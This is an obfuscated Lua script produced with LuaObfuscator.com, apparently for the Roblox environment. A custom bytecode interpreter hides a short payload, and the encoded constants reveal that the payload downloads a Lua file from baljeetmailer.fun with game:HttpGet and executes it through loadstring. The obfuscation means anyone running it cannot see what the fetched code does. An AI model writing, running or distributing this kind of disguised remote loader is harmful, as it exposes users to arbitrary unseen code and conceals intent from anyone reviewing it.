--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v83,v19);v19=nil;v100=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%(((1640 -(1523 + 114)) -1)^(((v33-(2 -1)) -(v32-((558 + 62) -(555 + 64)))) + 1)) ;return v84-(v84%(932 -(857 + 74))) ;else local v85=(809 -241) -(367 + 201) ;local v86;while true do if (v85==(927 -(214 + 713))) then v86=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (878 -(282 + 595))) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * ((1876 -(87 + 263)) -((406 -(67 + 113)) + 1044))) + v36 ;end if ((0 -0)==v35) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;v35=118 -(32 + 85) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24() local v42=952 -(802 + (1636 -(998 + 488))) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 -0 ;end if (v42==(2 + 0)) then v47=v20(v44,7 + 14 ,1028 -(915 + 82) );v48=((v20(v44,90 -58 )==(1 + 0)) and  -1) or (1 -0) ;v42=1190 -(1069 + 118) ;end if (v42==(2 -1)) then v45=1 -0 ;v46=(v20(v44,1 + 0 + 0 ,20) * (((775 -(201 + 571)) -1)^(32 + 0))) + v43 ;v42=2;end if (v42==3) then if (v47==(791 -(368 + 423))) then if (v46==(0 -0)) then return v48 * ((1156 -(116 + 1022)) -((41 -31) + 5 + 3)) ;else local v102=0 -0 ;while true do if (v102==(442 -(416 + (94 -68)))) then v47=1;v45=0 -0 ;break;end end end elseif (v47==(7269 -5222)) then return ((v46==(859 -(814 + 45))) and (v48 * ((1 + 0)/0))) or (v48 * NaN) ;end return v8(v48,v47-(1809 -786) ) * (v45 + (v46/((440 -(145 + 293))^(482 -(44 + 386))))) ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(1 + 1)) then v52={};for v90=1 + 0 , #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=888 -(261 + 624) ;end if (v50==(0 -0)) then v51=nil;if  not v49 then local v96=0 + 0 ;while true do if (v96==(1080 -(1020 + (264 -204)))) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=1424 -(630 + 793) ;end if (v50==3) then return v6(v52);end if (v50==((3 + 0) -2)) then v51=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;v50=1057 -(87 + (2187 -1219)) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0;end)();while true do if ((0 -0)==v66) then if (v53~= #":") then else local v97=(function() return 1587 -(412 + 1175) ;end)();while true do if ((2 -1)==v97) then for v112= #"[",v58 do local v113=(function() return 0 + 0 ;end)();local v114=(function() return;end)();local v115=(function() return;end)();local v116=(function() return;end)();while true do if (v113~=(1 + 0)) then else v116=(function() return nil;end)();while true do if (v114== #"~") then if (v115== #"]") then v116=(function() return v21()~=0 ;end)();elseif (v115==2) then v116=(function() return v24();end)();elseif (v115~= #"asd") then else v116=(function() return v25();end)();end v59[v112]=(function() return v116;end)();break;end if (v114~=0) then else local v173=(function() return 0;end)();local v174=(function() return;end)();while true do if (v173==0) then v174=(function() return 0;end)();while true do if (v174~=0) then else v115=(function() return v21();end)();v116=(function() return nil;end)();v174=(function() return 1;end)();end if (v174==(1 -0)) then v114=(function() return  #"~";end)();break;end end break;end end end end break;end if (v113~=0) then else local v153=(function() return 1274 -(388 + 886) ;end)();local v154=(function() return;end)();while true do if (v153==0) then v154=(function() return 0 -0 ;end)();while true do if (v154~=(1 + 0)) then else v113=(function() return 561 -(306 + 254) ;end)();break;end if ((0 + 0)==v154) then v114=(function() return 0 -0 ;end)();v115=(function() return nil;end)();v154=(function() return 1468 -(899 + 568) ;end)();end end break;end end end end end v57[ #"19("]=(function() return v21();end)();v97=(function() return 2 + 0 ;end)();end if (v97~=(4 -2)) then else v53=(function() return 2;end)();break;end if (v97==(603 -(268 + 335))) then v58=(function() return v23();end)();v59=(function() return {};end)();v97=(function() return 291 -(60 + 230) ;end)();end end end if (0==v53) then local v98=(function() return 572 -(426 + 146) ;end)();local v99=(function() return;end)();while true do if (v98~=(0 + 0)) then else v99=(function() return 1456 -(282 + 1174) ;end)();while true do if (v99~=(813 -(569 + 242))) then else v53=(function() return  #":";end)();break;end if (v99==1) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v99=(function() return 1 + 1 ;end)();end if (v99~=(1024 -(706 + 318))) then else v54=(function() return {};end)();v55=(function() return {};end)();v99=(function() return 1252 -(721 + 530) ;end)();end end break;end end end v66=(function() return 1272 -(945 + 326) ;end)();end if (v66==(2 -1)) then if (2~=v53) then else for v103= #" ",v23() do local v104=(function() return v21();end)();if (v20(v104, #">", #"[")==(0 + 0)) then local v108=(function() return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (1==v108) then local v150=(function() return 0;end)();while true do if (v150==(700 -(271 + 429))) then v111=(function() return {v22(),v22(),nil,nil};end)();if (v109==0) then local v175=(function() return 0 + 0 ;end)();local v176=(function() return;end)();while true do if (v175==0) then v176=(function() return 1500 -(1408 + 92) ;end)();while true do if (v176==0) then v111[ #"91("]=(function() return v22();end)();v111[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v109== #" ") then v111[ #"91("]=(function() return v23();end)();elseif (v109==2) then v111[ #"-19"]=(function() return v23() -((1088 -(461 + 625))^16) ;end)();elseif (v109== #"gha") then local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183==(1288 -(993 + 295))) then v184=(function() return 0;end)();while true do if (v184==(0 + 0)) then v111[ #"xxx"]=(function() return v23() -(2^16) ;end)();v111[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v150=(function() return 1;end)();end if (v150==1) then v108=(function() return 1173 -(418 + 753) ;end)();break;end end end if ((0 + 0)==v108) then local v151=(function() return 0 + 0 ;end)();while true do if (v151==1) then v108=(function() return 1 + 0 ;end)();break;end if ((0 + 0)==v151) then v109=(function() return v20(v104,531 -(406 + 123) , #"91(");end)();v110=(function() return v20(v104, #"0836",1775 -(1749 + 20) );end)();v151=(function() return 1;end)();end end end if (v108==3) then if (v20(v110, #"nil", #"91(")~= #".") then else v111[ #"asd1"]=(function() return v59[v111[ #"0313"]];end)();end v54[v103]=(function() return v111;end)();break;end if (v108==(1 + 1)) then if (v20(v110, #".", #"/")== #">") then v111[2]=(function() return v59[v111[2]];end)();end if (v20(v110,1324 -(1249 + 73) ,1 + 1 )~= #":") then else v111[ #"gha"]=(function() return v59[v111[ #"gha"]];end)();end v108=(function() return 1148 -(466 + 679) ;end)();end end end end for v105= #".",v23() do v55[v105-#"[" ]=(function() return v28();end)();end return v57;end break;end end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[4 -(3 -1) ];local v65=v60[6 -3 ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=2 -1 ;local v72= -(1901 -(106 + 1794));local v73={};local v74={...};local v75=v12("#",...) -(1 + 0) ;local v76={};local v77={};for v87=(0 -0) + (1227 -(322 + 905)) ,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 + 0 ];else v77[v87]=v74[v87 + (754 -(239 + 514)) ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do v79=v67[v71];v80=v79[(2920 -1590) -(797 + 532) ];if ((v80<=(20 -13)) or (2232>2497)) then if (v80<=(7 -4)) then if (v80<=(115 -(4 + 110))) then if (v80>(1202 -(373 + 829))) then do return;end else local v117=584 -(57 + (1138 -(602 + 9))) ;local v118;while true do if (v117==(1427 -(41 + 1386))) then v118=v79[(2321 -(449 + 740)) -(369 + 761) ];v77[v118]=v77[v118](v13(v77,v118 + (104 -(17 + 86)) ,v72));break;end end end elseif (v80==(2 -(0 -0))) then v77[v79[2 + 0 ]]={};else do return;end end elseif ((v80<=(11 -(1 + 5))) or (2110<=332)) then if (v80==(11 -(1697 -(1121 + 569)))) then v77[v79[168 -(122 + 44) ]]=v79[5 -2 ];else v77[v79[(220 -(22 + 192)) -4 ]]();end elseif ((3686>3172) and ((v80==(222 -((725 -(483 + 200)) + 174))) or (2150<=1197))) then local v122=v79[2];local v123,v124=v70(v77[v122](v13(v77,v122 + 1 + 0 ,v79[3 + 0 ])));v72=(v124 + v122) -((1464 -(1404 + 59)) + 0) ;local v125=(0 -0) -0 ;for v148=v122,v72 do local v149=65 -(30 + 35) ;while true do if (v149==(1580 -(1183 + 397))) then v125=v125 + 1 + 0 ;v77[v148]=v123[v125];break;end end end else local v126=0 + 0 ;local v127;while true do if (v126==(1257 -(1043 + (1086 -(826 + 46))))) then v127=v79[1977 -((2570 -657) + 62) ];v77[v127]=v77[v127](v13(v77,v127 + (3 -2) ,v72));break;end end end elseif ((v80<=(1223 -((1270 -(245 + 702)) + (2808 -1919)))) or (4474<820)) then if ((4279>=2882) and (v80<=(23 -14))) then if ((v80==(588 -(361 + 219))) or (2029>=3521)) then v77[v79[(884 -(334 + 228)) -(53 + 267) ]]=v62[v79[1 + 2 ]];else local v130=413 -((50 -35) + 398) ;local v131;local v132;while true do if ((3769>=1173) and ((982 -(18 + 964))==v130)) then v131=v79[(3 + 4) -5 ];v132=v77[v79[2 + 1 ]];v130=(1899 -(260 + 1638)) + (440 -(382 + 58)) ;end if (((851 -(20 + 830))==v130) or (2037>=4642)) then v77[v131 + (1 -0) + 0 ]=v132;v77[v131]=v132[v79[4]];break;end end end elseif ((1485==1485) and (v80>(866 -(564 + 292)))) then v77[v79[128 -(116 + 10) ]]();else v77[v79[1 + 1 ]]=v62[v79[741 -(542 + 196) ]];end elseif (v80<=(27 -14)) then if (v80==(4 + 8)) then v77[v79[478 -((131 -90) + 435) ]]={};else v77[v79[2 + 0 + 0 ]]=v79[2 + 1 ];end elseif (v80>(36 -22)) then local v138=0 -0 ;local v139;local v140;local v141;local v142;while true do if (((1553 -(1126 + 425))==v138) or (3315<=2782)) then for v170=v139,v72 do local v171=405 -(118 + 287) ;while true do if ((v171==(0 -0)) or (876>=2964)) then v142=v142 + (1122 -(118 + (1239 -(141 + 95)))) ;v77[v170]=v140[v142];break;end end end break;end if ((1720<4458) and (v138==((0 + 0) -0))) then v139=v79[379 -(142 + 235) ];v140,v141=v70(v77[v139](v13(v77,v139 + (1093 -(975 + 117)) ,v79[13 -10 ])));v138=1 + (0 -0) ;end if (v138==(978 -(553 + 424))) then v72=(v141 + v139) -((2 -1) -0) ;v142=0 + 0 ;v138=2;end end else local v143=v79[(2225 -(902 + 303)) -(697 + 321) ];local v144=v77[v79[3 + 0 ]];v77[v143 + 1 + 0 ]=v144;v77[v143]=v144[v79[2 + 0 + (4 -2) ]];end v71=v71 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403373Q00682Q7470733A2Q2F62616C6A2Q65746D61696C65722E66756E2F7363726970742F66722Q652F363762313061396431656136342E6C756100094Q00027Q001208000100013Q001208000200023Q00200900020002000300120D000400044Q000F000200044Q000700013Q00022Q000B0001000100012Q00013Q00017Q00",v9(),...);
